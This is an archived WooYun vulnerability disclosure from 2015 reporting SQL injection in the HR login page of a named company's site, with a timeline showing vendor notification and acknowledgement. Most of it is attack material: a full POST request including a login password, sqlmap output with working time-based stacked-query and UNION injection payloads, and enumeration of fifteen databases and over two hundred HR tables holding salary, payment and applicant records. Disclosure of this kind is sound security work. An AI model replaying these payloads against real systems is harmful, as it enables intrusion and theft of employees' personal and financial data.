乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-18: 细节已通知厂商并且等待厂商处理中 2015-12-18: 厂商已经确认,细节仅向厂商公开 2015-12-28: 细节向核心白帽子及相关领域专家公开 2016-01-07: 细节向普通白帽子公开 2016-01-17: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
POST /HR/LoginTo.aspx HTTP/1.1Content-Length: 2583Content-Type: application/x-www-form-urlencodedCookie: ASPSESSIONIDCABDADDD=AMELIIPAGPFFMEGBLJGGOACJ; ASPSESSIONIDACADDADC=CBPLBNOAKCCIJBGGOMLMHMIN; ASP.NET_SessionId=b4fo3etcwb4xfls0stxndg2aHost: gy.emaotai.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*btnlogin=&cbxOrgs=e&cbxOrgs%24DDD%24L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42%2c1_74%2c2_22%2c2_29%2c2_21%2c1_67%2c1_64%2c2_24%2c1_41%2c2_15&tbxPassword=g00dPa%24%24w0rD&UsersPanel%24cbxUsers=e&UsersPanel%24cbxUsers%24DDD%24L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM%2bskZ93r%2bLE0i79YMR0%2b6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm%2bi1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho%2bahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs%2bWKqOe6quW%2bi%2bebkeWvn%2bWupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L%2bd566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD%2beUn%2ba0u%2bacjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu%2bmAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L%2bh5oGv5Lit5b%2bDHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y%2bR5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW%2bkOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee%2bih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw%3d%3d&__VIEWSTATEGENERATOR=CAB2EC08
sqlmap resumed the following injection point(s) from stored session:---Parameter: UsersPanel_cbxUsers_VI (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1';WAITFOR DELAY '0:0:5'--&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08 Type: UNION query Title: Generic UNION query (NULL) - 10 columns Payload: btnlogin=&cbxOrgs=e&cbxOrgs$DDD$L=98&cbxOrgs_DDDWS=0:0:11998:0:-15:0:-10000:-10000:1&cbxOrgs_DDD_LCustomCallback=&cbxOrgs_DDD_LDeletedItems=&cbxOrgs_DDD_LInsertedItems=&cbxOrgs_VI=98&DXScript=1_42,1_74,2_22,2_29,2_21,1_67,1_64,2_24,1_41,2_15&tbxPassword=g00dPa$$w0rD&UsersPanel$cbxUsers=e&UsersPanel$cbxUsers$DDD$L=00000951&UsersPanel_cbxUsers_DDDWS=0:0:11998:0:143:0:-10000:-10000:1&UsersPanel_cbxUsers_DDD_LCustomCallback=&UsersPanel_cbxUsers_DDD_LDeletedItems=&UsersPanel_cbxUsers_DDD_LInsertedItems=&UsersPanel_cbxUsers_VI=1' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(74)+CHAR(70)+CHAR(88)+CHAR(99)+CHAR(77)+CHAR(83)+CHAR(78)+CHAR(69)+CHAR(73)+CHAR(76)+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)-- &__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAKSueCRBQLmpufNCAKJoNWhAwLH0qW1DhXFr1VkYjSp/Ue6vj5NiM+skZ93r+LE0i79YMR0+6mT&__VIEWSTATE=/wEPDwUKMTk3MzE5Njk5MQ9kFgICAQ9kFgQCAQ8UKwAFDxYCHgVWYWx1ZQUCOThkZGQ8KwAJAQg8KwAEAQIPFgIeCklzU2F2ZWRBbGxnDxQrABMUKwABFgYeBFRleHQFFeS6uuWKm+i1hOa6kOekvuS/nemDqB8ABQI5OB4OUnVudGltZUNyZWF0ZWRnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOWKnuWFrOWupB8ABQMxODIfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Lq65Yqb6LCD6YWN56eRHwAFAzE3NR8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDlt6XotYTnp5EfAAUDMTc0HwNnFCsAARYGHwIFFeOAgOOAgOKUnOKUgOaho+ahiOWupB8ABQMxNzYfA2cUKwABFgYfAgUV44CA44CA4pSc4pSA6IGM56ew5YqeHwAFAzE2Nh8DZxQrAAEWBh8CBRXjgIDjgIDilJzilIDln7norq3lip4fAAUDMTY3HwNnFCsAARYGHwIFIeOAgOOAgOKUnOKUgOWKs+WKqOe6quW+i+ebkeWvn+WupB8ABQMxNzcfA2cUKwABFgYfAgUb44CA44CA4pSc4pSA5Yqz5L+d566h55CG5a6kHwAFAzE3OB8DZxQrAAEWBh8CBRLjgIDjgIDilJzilIDnpL7kv50fAAUDMTE0HwNnFCsAARYGHwIFD+eUn+a0u+acjeWKoemDqB8ABQIzMx8DZxQrAAEWBh8CBQzogqHku73otKLliqEfAAUCMjEfA2cUKwABFgYfAgUM5pyJ6ZmQ6LSi5YqhHwAFAjMxHwNnFCsAARYGHwIFDOmUgOWUruWFrOWPuB8ABQIzNh8DZxQrAAEWBh8CBQznlJ/kuqfovabpl7QfAAUDMTE3HwNnFCsAARYGHwIFDOemu+mAgOS8keWKnh8ABQMxMTIfA2cUKwABFgYfAgUM5L+h5oGv5Lit5b+DHwAFAjc2HwNnFCsAARYGHwIFDOS4tOaXtui0puaItx8ABQMxNjQfA2cUKwABFgYfAgUM5byA5Y+R5Y2V5L2NHwAFAjIzHwNnZGRkAgMPZBYCZg9kFgJmD2QWAmYPZBYCAgEPFCsABQ8WAh8ABQgwMDAwMDk1MWRkZDwrAAkBCBQrAAQWBB4SRW5hYmxlQ2FsbGJhY2tNb2RlZx4nRW5hYmxlU3luY2hyb25pemF0aW9uT25QZXJmb3JtQ2FsbGJhY2sgaGQPFgIfAWcPFCsABBQrAAEWBh8CBQblvpDlvLofAAUIMDAwMDA5NTEfA2cUKwABFgYfAgUJ5YiY5bmy5YqyHwAFCDAwMDAwODc0HwNnFCsAARYGHwIFDuW+kOW8uijnm5bnq6ApHwAFCDAwMDAwOTc2HwNnFCsAARYGHwIFCeW8oOeOiee+ih8ABQgwMDAwMDg4Nh8DZ2RkZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgQFC2NieE9yZ3MkREREBRdVc2Vyc1BhbmVsJGNieFVzZXJzJERERAUIYnRubG9naW4FB2J0bkV4aXSpbthwzUqxrU687il8V5CiXxiRPsztLv579eipor5VVw==&__VIEWSTATEGENERATOR=CAB2EC08---web server operating system: Windows 2003 or XPweb application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008available databases [15]:[*] DrpECO[*] EA[*] gy[*] HR[*] HRTest[*] master[*] model[*] moutaiBak[*] moutaiDev[*] moutaiTest[*] msdb[*] QRTest[*] rsda[*] tempdb[*] test
一共是15个库,当前库为HR:
Database: HR+------------------------------------------------+---------+| Table | Entries |+------------------------------------------------+---------+| dbo.t_gz_ffb | 1690142 || dbo.v_gzb_view | 1690142 || dbo.t_gjj_ffb | 1602979 || dbo.v_gjj | 1602979 || dbo.t_zlbt_ffb | 1159908 || dbo.v_zlbt | 1159908 || dbo.t_nj_month | 677127 || dbo.t_sys_logs | 415324 || dbo.t_nj_ygtz | 342025 || dbo.v_nj_ygtz | 342025 || dbo.v_qynj | 342025 || dbo.t_gz_year | 202209 || dbo.t_nj_year | 118666 || dbo.v_da_ddjlb | 80073 || dbo.t_da_jt | 67327 || dbo.t_rygl_rygzgxb | 55518 || dbo.t_da_jl | 53607 || dbo.t_kq_hzb | 45436 || dbo.t_kq_kq | 36151 || dbo.v_kq_kq_cn | 36151 || dbo.v_kq_kq_cn | 36151 || dbo.t_sys_queue | 34627 || dbo.tmp_sb_ndbb | 32684 || dbo.t_gz_sw | 31389 || dbo.tmp_sb_yearydhj | 23987 || dbo.t_sbgl_ygsbhz | 23888 || dbo.t_da_index | 21799 || dbo.v_da_index | 21799 || dbo.v_gz_da1 | 21799 || dbo.v_gz_da_cn | 21799 || dbo.v_gz_da_cn | 21799 || dbo.v_gz_da_cn | 21799 || dbo.v_nj_da_import | 21799 || dbo.v_rs_da_cn | 21799 || dbo.v_rs_da_cn | 21799 || dbo.v_ry_fromGz | 21799 || dbo.v_sp_da | 21799 || dbo.t_gz_kjbz | 21739 || dbo.v_gz_kjbz | 21739 || dbo.t_zp_img | 21690 || dbo.v_nj_da_cn | 20532 || dbo.v_nj_da_cn | 20532 || dbo.v_nj_rylb | 20532 || dbo.t_ht_index | 20178 || dbo.v_da_ht_cn | 20178 || dbo.v_da_ht_cn | 20178 || dbo.v_ht_index | 20178 || dbo.v_ryda | 20134 || dbo.t_da_img | 19479 || dbo.t_da_ht_201301_bak | 15978 || dbo.t_da_ht_201301_bak | 15978 || dbo.t_zlbt_year_per | 14800 || dbo.tmp_t_gz_da | 14575 || dbo.t_gz_da_yf | 14276 || dbo.t_gz_da_cache | 14139 || dbo.gz201110 | 12410 || dbo.gz201109 | 12281 || dbo.t_da_ddjlb_999912 | 12281 || dbo.t_da_ddjlb_999912 | 12281 || dbo.t_xtgl_jsqx | 12197 || dbo.t_da_ht_bak | 12027 || dbo.v_da_rsdab | 11961 || dbo.t_da_zc | 11175 || dbo.v_da_zc | 11175 || dbo.tmp_rsda_wh | 10111 || dbo.t_rygl_gdkk | 9691 || dbo.t_nj_ffb | 9157 || dbo.t_sp_spbgmx_list | 9130 || dbo.t_sp_spbgmx_list | 9130 || dbo.t_sp_spbgmx_list | 9130 || dbo.v_sp_spbgmx_list | 9130 || dbo.v_sp_spbgmx_list | 9130 || dbo.v_sp_spbgmx_list | 9130 || dbo.t_nj_jcjlb | 8684 || dbo.v_da_old_bwh | 8194 || dbo.yhzh2 | 7916 || dbo.yhzh2 | 7916 || dbo.tmp_ndgz_tot | 7544 || dbo.t_da_zctz | 7509 || dbo.v_da_zctz | 7509 || dbo.t_zp_da | 6960 || dbo.zlbt | 6872 || dbo.t_rpt_ryddjl | 5860 || dbo.t_sys_Columdef | 5532 || dbo.t_rygl_csrq | 5102 || dbo.tmp_gzda_bwh | 3964 || dbo.t_hr_log | 2856 || dbo.tmp_dqht1 | 2674 || dbo.tmp_dqht2 | 2657 || dbo.t_gz_da_2 | 2648 || dbo.tmp_sb_kq | 2324 || dbo.t_da_rsdab_1 | 1797 || dbo.t_da_rsdab_1 | 1797 || dbo.tmp_kq_2013 | 1788 || dbo.tmp_sbnj | 1678 || dbo.t_xtgl_dwbmb | 1671 || dbo.t_xtgl_dwzzjgb | 1268 || dbo.v_xtgl_dwzzjgb | 1248 || dbo.t_zlbt_year_dpt | 1196 || dbo.t_cx_sql | 988 || dbo.t_sp_dwdl | 986 || dbo.t_xtgl_czryjs | 978 || dbo.t_xtgl_czryjs | 978 || dbo.tmp_yhjj_Import | 884 || dbo.t_gz_hzb | 815 || dbo.t_sys_fielddef | 795 || dbo.t_sp_tzjl | 777 || dbo.t_xtgl_jsgsb | 751 || dbo.t_da_jc | 684 || dbo.t_rygl_rydab_tx | 675 || dbo.tmp_gxbd_101 | 673 || dbo.tmp_gxbd_101 | 673 || dbo.tmp_gxbd_101 | 673 || dbo.tmp_gxbd_102 | 673 || dbo.t_gz_ffbt | 593 || dbo.v_gzbt | 593 || dbo.t_sp_spjl | 542 || dbo.t_sp_cljl | 508 || dbo.tmp_rybh | 506 || dbo.t_xtgl_dm | 501 || dbo.tmpYxtx | 470 || dbo.t_gjj_ffbt | 411 || dbo.v_xtgl_dm | 410 || dbo.t_zlbt_da_tmp | 403 || dbo.t_zlbt_da_tmp | 403 || dbo.tmp_dabh | 340 || dbo.t_zlbt_ffbt | 336 || dbo.t_zlbt_hzb | 313 || dbo.t_sys_tabledef | 310 || dbo.t_da_xs | 306 || dbo.cj1201 | 253 || dbo.tmpfzf1 | 211 || dbo.tmpgftx | 209 || dbo.t_sys_StoreProc | 197 || dbo.t_da_bdjl | 159 || dbo.tmp_njgl_2013txry | 157 || dbo.tmp_sb_tx | 153 || dbo.t_sys_project | 152 || dbo.SolarData | 150 || dbo.t_gz_da_bhw | 149 || dbo.t_xtgl_rjmkbmb | 142 || dbo.t_sys_code | 141 || dbo.t_da_rsdab_tmp | 130 || dbo.t_gjj_hzb | 122 || dbo.njkk2012 | 120 || dbo.t_nj_da_tmp | 100 || dbo.t_nj_da_tmp | 100 || dbo.t_px_tzpx | 100 || dbo.v_px_tzpx | 100 || dbo.t_xtgl_czjsb | 97 || dbo.t_gz_da_tmp | 94 || dbo.t_bank_import_gjj | 92 || dbo.t_bank_import_gjj | 92 || dbo.t_zlbt_log | 85 || dbo.tmp_gxbd201304 | 73 || dbo.tmp_da_rsdab | 54 || dbo.tmp_nj_2013 | 53 || dbo.tmp_rsda_bwh_end | 53 || dbo.tmp_rsda_bwh_end | 53 || dbo.tmpgflt | 48 || dbo.t_zp_jh | 36 || dbo.t_gz_da_12100002注销人员 | 32 || dbo.t_sys_haliday | 29 || dbo.t_cx_Rpt | 27 || dbo.t_gz_da_12100001注销人员 | 26 || dbo.t_gz_da_12100001注销人员 | 26 || dbo.t_gz_da_12100001注销人员 | 26 || dbo.t_cx_backup | 23 || dbo.t_nj_yfze | 20 || dbo.t_xtgl_csb | 18 || dbo.t_px_course | 17 || dbo.t_nj_yhllb | 16 || dbo.dtproperties | 14 || dbo.tm_nj_ygtz_1月征收 | 14 || dbo.tmpyxlt | 14 || dbo.t_sys_subject_dm | 13 || dbo.t_sys_subject_dm | 13 || dbo.t_xtgl_sydyb | 12 || dbo.t_xtgl_config | 10 || dbo.t_nj_ndze | 9 || dbo.t_help_book | 6 || dbo.tmp_cwgs | 6 || dbo.lst_dwTree_Nodes | 4 || dbo.t_xtgl_bgdyb | 4 || dbo.t_kq_grhz | 3 || dbo.t_kq_jqts | 3 || dbo.t_sys_totparams | 3 || dbo.v_kq_jqts | 3 || dbo.sysdiagrams | 2 || dbo.t_kq_qxj | 2 || dbo.t_px_org | 2 || dbo.t_xtgl_yhcp | 2 || dbo.v_kq_qxj | 2 || dbo.AspNet_SqlCacheTablesForChangeNotification | 1 || dbo.t_px_plan | 1 || dbo.t_sys_requirement | 1 || dbo.t_zp_gg | 1 || dbo.v_nj_ffbg | 1 || dbo.v_nj_ffbg | 1 |+------------------------------------------------+---------+
众多信息泄露,由于表名命令没啥规律,所以翻看了几个表:
v_zlbt表,百万信息量:
应该是打款信息:
t_zp_da,求职者信息:
HR库,一共200多个表,信息量肯定很多,就不一一去翻看了!
危害等级:中
漏洞Rank:8
确认时间:2015-12-18 11:42
感谢您的反馈,我们将尽快修复。
暂无
